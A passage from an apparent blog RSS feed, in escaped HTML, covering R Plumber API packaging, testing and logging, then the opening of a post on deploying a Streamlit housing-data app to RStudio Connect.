&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ └──/echo (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/nested&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──/example&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ └──/echo (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ └──/is_alive (GET)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This {cookieCutter} example is available to view at our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-api-as-package-structure" rel="external"&gt;GitHub blog
repo&lt;/a&gt;.&lt;/p&gt;
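&lt;p&gt;To make the mapping from files to URLs concrete, here is a minimal sketch of how the three example files end up at their final paths. It assumes that each mount path is simply the file path without its &lt;code&gt;.R&lt;/code&gt; extension, as the router printout above suggests. The variable names are illustrative only, and base &lt;code&gt;vapply()&lt;/code&gt; stands in for &lt;code&gt;purrr::map_chr()&lt;/code&gt; so that the snippet has no dependencies.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ensure_slash = function(string) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  has_slash = grepl(&amp;#34;^/&amp;#34;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  if (has_slash) string else paste0(&amp;#34;/&amp;#34;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Relative paths of the three example route files
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files = c(&amp;#34;example.R&amp;#34;, &amp;#34;test.R&amp;#34;, &amp;#34;nested/example.R&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Assumption: the mount path is the file path without its extension
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;route_names = tools::file_path_sans_ext(files)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# ensure_slash() is not vectorised (it uses `if`), so apply it per element
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mounts = vapply(route_names, ensure_slash, character(1), USE.NAMES = FALSE)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# The path in each file&amp;#39;s decorator is appended to its mount path
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;decorators = c(&amp;#34;/echo&amp;#34;, &amp;#34;/is_alive&amp;#34;, &amp;#34;/echo&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;urls = paste0(mounts, decorators)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;urls
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# &amp;#34;/example/echo&amp;#34;, &amp;#34;/test/is_alive&amp;#34;, &amp;#34;/nested/example/echo&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;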
&lt;h2 id="basic-testing"&gt;Basic testing&lt;/h2&gt;
&lt;p&gt;In my real project I refrained from defining any functions in
&lt;code&gt;inst/&lt;/code&gt;. Instead, each function that was part
of the exposed API was a proper exported function from my package
(the filenames for these functions also followed a regular structure,
&lt;code&gt;api_&amp;lt;topic&amp;gt;.R&lt;/code&gt;). This allows for leveraging &lt;code&gt;{testthat}&lt;/code&gt; against
the logic of each of the functions, as well as using other tools like
&lt;code&gt;{lintr}&lt;/code&gt; and ensuring that dependencies, documentation etc. are all
dealt with appropriately. Testing individual functions that will be
exposed as routes can be a little different to testing other R functions, in that
the objects passed as arguments come from a request. As alluded to in
the introduction, I will prepare another blog post detailing some
elements of testing for an API as a package, but a short snippet that I
found particularly helpful for testing that a running API is functioning
as I expect is included here.&lt;/p&gt;
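&lt;p&gt;Because the route logic lives in ordinary exported functions, a unit test of that logic does not need a running API. A minimal sketch, assuming a hypothetical exported function &lt;code&gt;api_is_alive()&lt;/code&gt; that backs the &lt;code&gt;/is_alive&lt;/code&gt; route (the function and file names are illustrative, not taken from the real project):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# R/api_test.R (hypothetical): the logic behind the /is_alive route
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api_is_alive = function() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  list(alive = TRUE)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# tests/testthat/test-api_test.R (hypothetical): test the logic directly
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;testthat::test_that(&amp;#34;api_is_alive() reports the API as alive&amp;#34;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  testthat::expect_equal(api_is_alive(), list(alive = TRUE))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Tests like this check the function in isolation; they do not check that the route is mounted at the expected path, which is what a test against a running API adds.&lt;/p&gt;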
&lt;p&gt;The following code could be used to set up (and subsequently tear down)
a running API that is expecting requests for a package &lt;code&gt;cookieCutter&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# tests/testthat/setup.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run before any tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# pick a random available port to serve your app locally&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httpuv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;randomPort&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start a background R process that launches an instance of the API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# serving on that random port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;running_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; callr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;r_bg&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(port) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;(dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cookieCutter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;(routes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port, host &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; port)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Small wait for the background process to ensure it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# starts properly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.sleep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## run after all tests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;withr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;defer&lt;/span&gt;(running_api&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;kill&lt;/span&gt;(), testthat&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;teardown_env&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A simple test to ensure that our &lt;code&gt;is_alive&lt;/code&gt; endpoint works might then look
like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;is alive&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; httr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;GET&lt;/span&gt;(glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;http://0.0.0.0:{port}/test/is_alive&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_equal&lt;/span&gt;(res&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;status_code, &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="logging"&gt;Logging&lt;/h2&gt;
&lt;p&gt;{shiny} has some useful packages for adding logging; in particular,
{shinylogger} is very helpful, giving you plenty of logging for little
effort on the part of the user. As far as I could find, nothing similar
exists for {plumber}, so I set up a bunch of hooks, using the {logger}
package to write information to both file and terminal. Since that could
form its own blog post, I will save that discussion for the future.&lt;/p&gt;
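&lt;p&gt;As a rough illustration of the idea only, and not the setup used in the real project, hooks of this kind might be registered along the following lines. The log file name, the choice of the &lt;code&gt;preroute&lt;/code&gt; and &lt;code&gt;postroute&lt;/code&gt; stages and the message formats are all assumptions made for this sketch.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Send log records to both the terminal and a file (hypothetical file name)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;logger::log_appender(logger::appender_tee(&amp;#34;api.log&amp;#34;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# An empty router stands in for the one returned by generate_api()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api = plumber::pr(NULL)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;# Log each request as it arrives and again once a route has handled it
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;api = plumber::pr_hooks(api, list(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  preroute = function(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    logger::log_info(&amp;#34;{req$REQUEST_METHOD} {req$PATH_INFO}&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  postroute = function(req, res) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    logger::log_info(&amp;#34;{req$PATH_INFO} returned status {res$status}&amp;#34;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;  }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;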
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-structure/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python application deployment with RStudio Connect: Streamlit</title><link>https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/</link><pubDate>Thu, 08 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/streamlit.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the final part of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/" rel="external"&gt;Part 1: Python API deployment with RStudio Connect: Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/" rel="external"&gt;Part 2: Python API deployment with RStudio Connect: FastAPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Python application deployment with RStudio Connect: Streamlit (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; is a platform well known for deploying and sharing R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs, as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; reports. However, despite the name, it is not just for R developers (hence their &lt;a href="https://www.rstudio.com/blog/rstudio-is-becoming-posit/" rel="external"&gt;recent announcement&lt;/a&gt;). RStudio Connect also supports a growing number of Python applications: API services including &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt; and &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt;, and interactive web-based apps such as &lt;a href="http://docs.bokeh.org/en/latest/" rel="external"&gt;Bokeh&lt;/a&gt; and &lt;a href="https://streamlit.io/" rel="external"&gt;Streamlit&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In this post we will look at how to deploy a Streamlit application to RStudio Connect. Streamlit is a framework for creating interactive web apps for data visualisation in Python. Its API makes it quick and easy to display data and create interactive widgets from just a regular Python script.&lt;/p&gt;
&lt;h3 id="creating-a-streamlit-app"&gt;Creating a Streamlit app&lt;/h3&gt;
&lt;p&gt;First of all we need to create a project folder and install Streamlit in a virtual environment. The &lt;a href="https://docs.streamlit.io/library/get-started/installation" rel="external"&gt;Streamlit documentation&lt;/a&gt; recommends using the &lt;a href="https://pypi.org/project/pipenv/" rel="external"&gt;Pipenv&lt;/a&gt; environment manager for Linux/macOS.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir streamlit-deploy-demo &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd streamlit-deploy-demo
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv shell
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install streamlit
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test your installation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;streamlit hello
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are using Windows then see &lt;a href="https://docs.streamlit.io/library/get-started/installation" rel="external"&gt;here&lt;/a&gt; for how to install Streamlit with Anaconda.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-deploy-streamlit-rsconnect"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;For this demo there are a few other dependencies, which we can install with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install plotly scikit-learn &lt;span style="color:#79c0ff"&gt;pydeck&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt;0.7.1
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are getting started with Streamlit you might like to check out their &lt;a href="https://docs.streamlit.io/library/get-started/create-an-app" rel="external"&gt;tutorial&lt;/a&gt; for a more in-depth guide on how to build an app. However, for the purposes of this blog post we give the code for an example app below. This loads the &lt;a href="https://scikit-learn.org/stable/datasets/real_world.html#california-housing-dataset" rel="external"&gt;California housing dataset&lt;/a&gt; and displays some plots and maps of the data using &lt;a href="https://dash.plotly.com/" rel="external"&gt;Plotly&lt;/a&gt;, Streamlit and &lt;a href="https://deckgl.readthedocs.io/en/latest/" rel="external"&gt;Pydeck&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Create a file called &lt;code&gt;streamlit_housing.py&lt;/code&gt; with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and copy the code below into it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# streamlit_housing.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.datasets&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; fetch_california_housing
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;streamlit&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;st&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plotly.express&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;px&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pydeck&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pdk&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
